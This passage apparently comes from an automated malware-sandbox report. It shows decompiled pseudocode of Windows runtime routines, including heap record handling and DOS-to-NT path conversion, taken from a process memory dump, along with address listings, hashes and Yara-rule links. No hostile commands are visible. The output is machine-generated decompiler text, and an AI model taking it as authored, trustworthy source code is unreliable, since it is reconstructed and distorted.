														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E050CF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E050CF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E050CFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E050CFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E050CF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E050CF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05154CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E050DD130(_t427, _t494, _t511);
				}
			}

0x05155ba5
0x05155baa
0x05155baf
0x05155bb4
0x05155bb6
0x05155bbc
0x05155bbe
0x05155bc4
0x05155bcd
0x05155bd3
0x05155bd6
0x05155bdc
0x05155be0
0x05155be3
0x05155beb
0x05155bf2
0x05155bf8
0x05155bfe
0x05155c04
0x05155c0e
0x05155c18
0x05155c1f
0x05155c25
0x05155c2a
0x05155c2c
0x05155c32
0x05155c3a
0x05155c3f
0x05155c42
0x05155c48
0x05155c5b
0x05155c5b
0x05155c2c
0x05155cb7
0x05155cb9
0x05155cbf
0x05155cc2
0x05155cca
0x05155ccb
0x05155ccb
0x05155cd1
0x05155cd7
0x05155cda
0x05155ce1
0x05155ce4
0x05155ce7
0x05155ced
0x05155cf3
0x05155cf9
0x05155cff
0x05155d08
0x05155d0a
0x05155d0e
0x05155d10
0x00000000
0x00000000
0x05155d16
0x05155d1a
0x00000000
0x00000000
0x05155d20
0x05155d22
0x05155d25
0x05155d2f
0x05155d2f
0x05155d33
0x05155d3d
0x05155d49
0x05155d4b
0x00000000
0x00000000
0x05155d5a
0x05155d5d
0x05155d60
0x00000000
0x00000000
0x05155d66
0x05155d69
0x00000000
0x00000000
0x05155d6f
0x05155d6f
0x05155d73
0x05155d79
0x05155d7f
0x05155d86
0x05155d95
0x05155d98
0x05155dba
0x05155dcb
0x05155dce
0x05155dd3
0x05155dd6
0x05155dd8
0x05155de6
0x05155dec
0x05155dee
0x05155df1
0x05155df3
0x0515635a
0x0515635a
0x00000000
0x0515635a
0x05155dfe
0x05155e02
0x05155e05
0x05155e07
0x05155e10
0x05155e13
0x05155e1b
0x05155e1c
0x05155e21
0x05155e22
0x05155e23
0x05155e25
0x05155e2a
0x05155e2c
0x05155e2e
0x05155e36
0x05155e39
0x05155e42
0x05155e47
0x05155e4d
0x05155e54
0x05155e54
0x05155e54
0x05155e2e
0x05155e5c
0x05155e5f
0x05155e62
0x05155e64
0x05155e6b
0x05155e70
0x05155e7a
0x05155e7a
0x05155e7a
0x05155e6b
0x05155e7e
0x05155e7f
0x05155e7f
0x05155e81
0x05155e87
0x05155e8b
0x05155e8c
0x05155e8c
0x05155e8c
0x05155e9a
0x05155e9c
0x05155ea2
0x05155ea6
0x05155f50
0x05155f50
0x05155f57
0x05155f66
0x05155f66
0x05155f66
0x05155f68
0x05155f6a
0x051563d0
0x00000000
0x05155f70
0x05155f70
0x05155f91
0x05155f9c
0x05155f9e
0x05155fa4
0x05155fa6
0x0515638c
0x05156392
0x051563a1
0x051563a7
0x051563af
0x051563af
0x051563bd
0x051563d8
0x00000000
0x051563d8
0x05155fac
0x05155fb2
0x05155fb4
0x05155fbd
0x05155fc6
0x05155fce
0x05155fd4
0x05155fdc
0x05155fec
0x05155fed
0x05155fee
0x05155fef
0x05155ff9
0x05155ffa
0x05155ffb
0x05155ffc
0x05156000
0x05156004
0x05156012
0x05156012
0x05156018
0x05156019
0x0515601a
0x0515601b
0x0515601c
0x05156020
0x05156059
0x0515605c
0x05156061
0x05156061
0x05156022
0x05156022
0x05156022
0x05156025
0x0515602a
0x0515602b
0x05156031
0x05156037
0x05156038
0x0515603e
0x05156048
0x05156049
0x0515604a
0x0515604b
0x0515604c
0x0515604d
0x05156053
0x05156054
0x05156054
0x05156062
0x05156065
0x05156067
0x0515606a
0x05156070
0x05156075
0x05156076
0x05156081
0x05156087
0x05156095
0x05156099
0x0515609e
0x051560a4
0x051560ae
0x051560b0
0x051560b3
0x051560b6
0x051560b8
0x051560ba
0x051560ba
0x051560ba
0x051560ba
0x051560be
0x051560c0
0x051560c5
0x051560c5
0x051560c5
0x051560c6
0x051560cd
0x05156114
0x051560cf
0x051560cf
0x051560d4
0x051560d5
0x051560da
0x051560db
0x051560e1
0x051560e2
0x051560e8
0x051560f8
0x051560fd
0x051560fe
0x05156102
0x05156104
0x05156107
0x05156109
0x0515610b
0x0515610b
0x0515610b
0x0515610b
0x0515610f
0x0515610f
0x05156117
0x0515611a
0x0515611f
0x05156125
0x05156134
0x05156139
0x0515613f
0x05156146
0x05156148
0x0515614b
0x0515614d
0x0515614f
0x0515614f
0x0515614f
0x0515614f
0x05156153
0x05156159
0x05156159
0x0515615c
0x05156163
0x05156169
0x0515616c
0x05156172
0x05156181
0x05156186
0x05156187
0x0515618b
0x05156191
0x05156195
0x051561a3
0x051561bb
0x051561c0
0x051561c3
0x051561cc
0x051561d0
0x051561dc
0x051561de
0x051561e1
0x051561e4
0x051561e6
0x051561e8
0x051561e8
0x051561e8
0x051561e8
0x051561e6
0x051561ec
0x051561f3
0x05156203
0x05156209
0x0515620a
0x05156216
0x0515621d
0x05156227
0x05156241
0x05156246
0x0515624c
0x05156257
0x05156259
0x0515625c
0x0515625e
0x05156260
0x05156260
0x05156260
0x05156260
0x0515625e
0x05156264
0x05156267
0x05156269
0x05156315
0x05156315
0x0515631b
0x0515631e
0x05156324
0x05156327
0x0515632f
0x05156330
0x05156333
0x0515633a
0x0515633c
0x05156335
0x05156335
0x05156335
0x0515633f
0x05156342
0x0515634c
0x05156352
0x05156355
0x05156355
0x05156359
0x00000000
0x0515626f
0x05156275
0x05156275
0x05156278
0x0515627e
0x0515627e
0x05156281
0x05156287
0x0515628d
0x05156298
0x0515629c
0x051562a2
0x0515629e
0x0515629e
0x0515629e
0x051562a7
0x051562a7
0x051562aa
0x051562b0
0x051562f0
0x051562f0
0x051562f2
0x051562f8
0x051562fd
0x051562b2
0x051562b2
0x051562b2
0x051562b5
0x051562dd
0x051562e2
0x051562e5
0x051562b7
0x051562b8
0x051562bb
0x051562bd
0x051562c0
0x051562c4
0x051562cd
0x051562cd
0x051562c0
0x051562bb
0x051562b5
0x05156302
0x05156303
0x05156305
0x05156305
0x05156305
0x0515630c
0x0515630c
0x00000000
0x0515627e
0x05156269
0x05155eac
0x05155ebb
0x05155ebe
0x05155ecb
0x05155ecb
0x05155ece
0x05155ece
0x05155ed4
0x05155ed7
0x05155ed9
0x05155edb
0x05155edb
0x05155ee1
0x05155ee1
0x05155ee3
0x05155f20
0x05155f20
0x05155ee5
0x05155ee5
0x05155ee5
0x05155ee8
0x05155f11
0x05155f18
0x05155eea
0x05155eea
0x05155eed
0x05155ef2
0x05155ef8
0x05155efb
0x05155f0a
0x05155f0a
0x05155eed
0x05155ee8
0x05155f22
0x05155f28
0x00000000
0x00000000
0x05155f30
0x05155f31
0x05155f37
0x05155f3a
0x05155f3d
0x05155f44
0x00000000
0x00000000
0x00000000
0x05155f46
0x05155f48
0x05155f4d
0x00000000
0x05155f4d
0x05155dda
0x05155ddf
0x00000000
0x05155ddf
0x05155dd8
0x05155da7
0x05155da9
0x05155dac
0x05155dae
0x00000000
0x05155db4
0x05155db4
0x00000000
0x05155db4
0x05155dae
0x05155d88
0x05155d8d
0x05156363
0x05156369
0x0515636a
0x05156370
0x05156372
0x0515637a
0x0515637b
0x0515637d
0x00000000
0x00000000
0x0515637f
0x05156385
0x00000000
0x05156385
0x05155d38
0x05155d3b
0x00000000
0x00000000
0x00000000
0x05155d3b
0x05155d27
0x05155d29
0x00000000
0x00000000
0x00000000
0x05156360
0x00000000
0x05156360
0x05155c10
0x05155c10
0x051563da
0x051563e5
0x051563e5

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5e06944382c3ea4276c76254ee918171b9d8d4559f5352ff92c85b9e86556e
Instruction ID: b3d2fc86c50321e85094faccff049cf659df272335f15ef8f736e0221121c8f9
Opcode Fuzzy Hash: ab5e06944382c3ea4276c76254ee918171b9d8d4559f5352ff92c85b9e86556e
Instruction Fuzzy Hash: 74427D75A00229CFDB24CF68C880BA9BBB2FF45314F5581EAD95DEB242D7349985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050A4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E050A4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x517d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E050BF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E050A6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L050A4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E050A6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M050A45F8))) {
												case 0:
													_v568 = 0x5061078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x50611c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L050A4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E050CF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E050CF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E050852A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0509EB70(1, 0x51779a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0509AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E050C95D0();
																			L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E050CB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E050C3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E050CB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x050a4128
0x050a4135
0x050a413c
0x050a4141
0x050a4145
0x050a4147
0x050a414e
0x050a4151
0x050a4159
0x050a415c
0x050a4160
0x050a4164
0x050a4168
0x050a416c
0x050a417f
0x050a4181
0x050a446a
0x050a446a
0x050a418c
0x050a4195
0x050a4199
0x050a4432
0x050a4439
0x050a443d
0x050a4442
0x050a4447
0x00000000
0x050a419f
0x050a41a3
0x050a41b1
0x050a41b9
0x050a41bd
0x050a45db
0x050a45db
0x00000000
0x050a41c3
0x050a41c3
0x050a41ce
0x050a41d4
0x050ee138
0x050ee13e
0x050ee169
0x050ee16d
0x050ee19e
0x050ee16f
0x050ee16f
0x050ee175
0x050ee179
0x050ee18f
0x050ee193
0x00000000
0x050ee199
0x00000000
0x050ee199
0x050ee193
0x00000000
0x00000000
0x00000000
0x050a41da
0x050a41da
0x050a41df
0x050a41e4
0x050a41ec
0x050a4203
0x050a4207
0x050ee1fd
0x050a4222
0x050a4226
0x050ee1f3
0x050ee1f3
0x050a422c
0x050a422c
0x050a4233
0x050ee1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x050a4239
0x050a4239
0x050a4239
0x050a4239
0x050a4233
0x050a4226
0x050a41ee
0x050a41ee
0x050a41f4
0x050a4575
0x050ee1b1
0x050ee1b1
0x00000000
0x050a457b
0x050a457b
0x050a4582
0x050ee1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x050a4588
0x050a4588
0x050a458c
0x050ee1c4
0x050ee1c4
0x00000000
0x050a4592
0x050a4592
0x050a4599
0x050ee1be
0x00000000
0x00000000
0x00000000
0x00000000
0x050a459f
0x050a459f
0x050a45a3
0x050ee1d7
